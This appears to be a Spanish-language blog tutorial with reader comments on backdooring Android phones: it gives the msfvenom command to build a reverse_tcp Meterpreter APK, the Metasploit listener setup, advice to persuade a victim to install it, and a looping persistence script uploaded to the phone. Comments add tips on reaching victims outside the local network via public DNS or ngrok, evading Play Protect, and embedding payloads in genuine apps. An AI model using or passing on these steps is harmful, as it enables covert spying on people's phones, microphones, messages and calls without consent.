Atacando Android -Backdoor Persistente -





   
 Luego de mucho tiempo de inactividad hoy vengo con un tema el cual nunca e tocado. Hablo de como podríamos llegar a atacar un sistema Android y obtener una meterpreter mediante una apk infectada. Como ya e mencionado en otros post, cuando obtenemos una sección meterpreter podemos hacer muchas cosas con el sistema victima como por ejemplo tomar capturas de pantalla, grabar audios con el micrófono, ver los mensajes al igual que las llamadas, y entre otras muchas cosas.

Bien empecemos, primero vamos a nuestro sistema atacante el cual será kali linux. Luego abrimos una terminal y pondremos el siguiente comando.

> msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.4 lport=4444 R > /root/Desktop/backdoor.apk

Bien lo que hicimos fue llamar msfvenom y con -p le indicamos el tipo de payload el cual vendría siendo android/meterpreter/reverse_tcp en host le indicamos nuestra ip y en lport el puerto que queremos dejar en modo escucha, luego R > significa la ruta donde queremos que se nos genere el apk y recordamos que debemos darle un nombre seguido de la extensión .apk en mi caso lo genere en el Desktop con el nombre backdoor.apk.

Ahora abrimos otra terminal y configuramos el modo escucha(listen) para cuando la victima instale el apk nos de nuestra meterpreter, haremos lo siguiente.

> msfconsole -q

> use multi/handler

> set payload android/meterpreter/reverse_tcp

Luego configuramos la ip y el puerto que usamos anterior mente en la apk.

> set lhost 192.168.0.4

> set lport 4444

> exploit -j

Listo ahora estará escuchando por la ip y el puerto que le dimos esperando una conexión.


Lo siguiente seria enviarla a nuestra victima y convencerlo de que la instale en su android. Una vez lo instale nos dirá que tenemos una nueva sección, para ver las secciones pondríamos.

> sessions -i

En nuestro caso solo tendremos una, para conectarnos a ella basta con poner.

> sessions -i 1



Aquí ya tendríamos nuestra meterpreter, para ver las opciones que tenemos podemos usar help.

> help



Nos saldrá una lista de comandos con su descripción.

Bien ahora debemos crear persistencia para conectarnos a nuestra victima cuando queramos. Para eso debemos ir al directorio sdcard de nuestro Android.

> cd /

> cd /sdcard/Download

Abrimos una terminal en nuestra maquina kali y creamos un archivo con el nombre persistence.sh  dentro de el copiamos el siguiente código.

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


volvemos a la meterpreter y una vez estamos en la ruta /sdcard/Download usamos el siguiente comando.

> upload /root/Desktop/persistence.sh

Luego abrimos una shell usando.

> shell

Vamos a la ruta de nuestro .sh y lo ejecutamos.


> cd /

> cd /sdcard/Download

> sh persistence.sh



Una vez lo ejecutemos el Android se reiniciara y perderemos la conexión pero tranquilos solo debemos volver a configurar el lister o el modo escucha y cuando el Android encienda nueva mente tendremos nuestra meterpreter.

Espero que les haya gustado este post, no olviden compartir y suscribirse gracias.

18 comentarios:

  1. amigo, no funciona, lo instale en mi android y no pasa nada, me podrias asesora por favor que es lo que esta pasando.

    ResponderBorrar
    Respuestas
    1. Si funciona a mi me sirvio los apk y el .sh si se hacen persistentes

      Borrar
    2. El lister se activa solo dentro del mismo host y puerto que configuraste en tu apk , es decir si decido irme a "x" lugar y quiero probar ingresar al cel pues no funcionara por que y estaria sobre otra red en pocas palabras con este metodo por cada wifi distinta debes hacer un apk para ese host

      Borrar
    3. efectivo ahora me gustaria saber como hacer para que playprotec no me cierre la secion de meterprrter esta me dura apox 60 segundos

      Borrar
    4. No es necesario hacer una apk por cada red que la victima conecte en el tutorial utiliza ips de aociadas a una misma red, pero puede probar configurar un host en dns abierto para toda las redes asi da igual en que red conecte si es en la local en 4g o en la wifi del vecino jajajaja

      Borrar
  2. Gracias por el aporte compañero. Esto funciona cuando utilizas la apk que genera metasploit, pero cuando metes el payload en una apk original no funciona. ¿Cómo sería en este caso? ¿Cómo se llama entonces al payload desde cualquier otra apk? Gracias

    ResponderBorrar
    Respuestas
    1. como hiciste para meter el payload en una app ya heca por ejemplo facebook lite o instagram yo no lo he logrado me da error al compilar la app

      Borrar
  3. hola..he visto otro blog parecido (https://nnodes.com/blog/2016/hackeando-android-con-metasploit) y segun el blog debo firmar el apk(no se si esto es necesario)..y he puesto los siguientes comandos:
    java -jar signapk.jar certicate.pem key.pk8 troyanowilyrex.apk troyanowilyrex-signed.apk
    pero me da ..Error: Unable to access jarfile signapk.jar
    ..no se a que se debe esto ,sospecho que el problema es el archivo signapk,jar pero no he encontrado otro archivo que lo reemplaze
    mi OS es kalilinux de 32 bits y el link donde he descargado el programa java para firmar es http://www.mediafire.com/file/jd02yq5s21v9pqn/SignApk.rar
    pdt:tengo pocos conocimientos de informatica pero estoy muy interesado en aprender

    ResponderBorrar
  4. Thanks for Sharing your detailed review on this Article. This Post will obviously help a lot of perople. PlayBox is the best online Streaming App for android users. Check the below links to know more about the niche topics.
    Free Movies Online iOS,
    PlayBox HD Watch Online,
    PlayBox Online Free,
    PlayBox Internet TV Online,

    ResponderBorrar
  5. Necesito ayuda cuando quiero guardar el archivo me sale "no encorder or badchars specified, outputting raw payload" y no me aparece el apk donde lo quiero guardar

    ResponderBorrar
  6. Para que versiones de Android esto funciona

    ResponderBorrar
  7. Se produjo un error durante el análisis del paquete eso me dice cuando quiero instalar el apk
    Por que?
    Cual es la solución

    ResponderBorrar
  8. no he podido encontrar un payload que no sea .apk necesito uno que sea .exe donde la victima al abrirlo lo ejecute automaticamente

    ResponderBorrar
  9. esto es para dentro de la red local es por eso que a muchos no les funciona, y creo que la mayoria buscamos para ataque fuera de la red local. es otro proceso mas meticuloso que este dentro de la red local. de igual forma muy buen aporte

    ResponderBorrar
    Respuestas
    1. configura un host y una dns publico abre tus puertos de escucha y cuando crees el payload pon la direccion de tu host dn y en cualquier parte del mundo mientras tu host este activo podras escuchar todo su trafico y tendras conexion directa al android

      Borrar
  10. para fuera de la red local usaf ngrok!!!

    ResponderBorrar
  11. you may experience some fraudulent activity while trying to apply for your credit card over the Internet with one of these bad sectors. Read more about my website: dark web links

    ResponderBorrar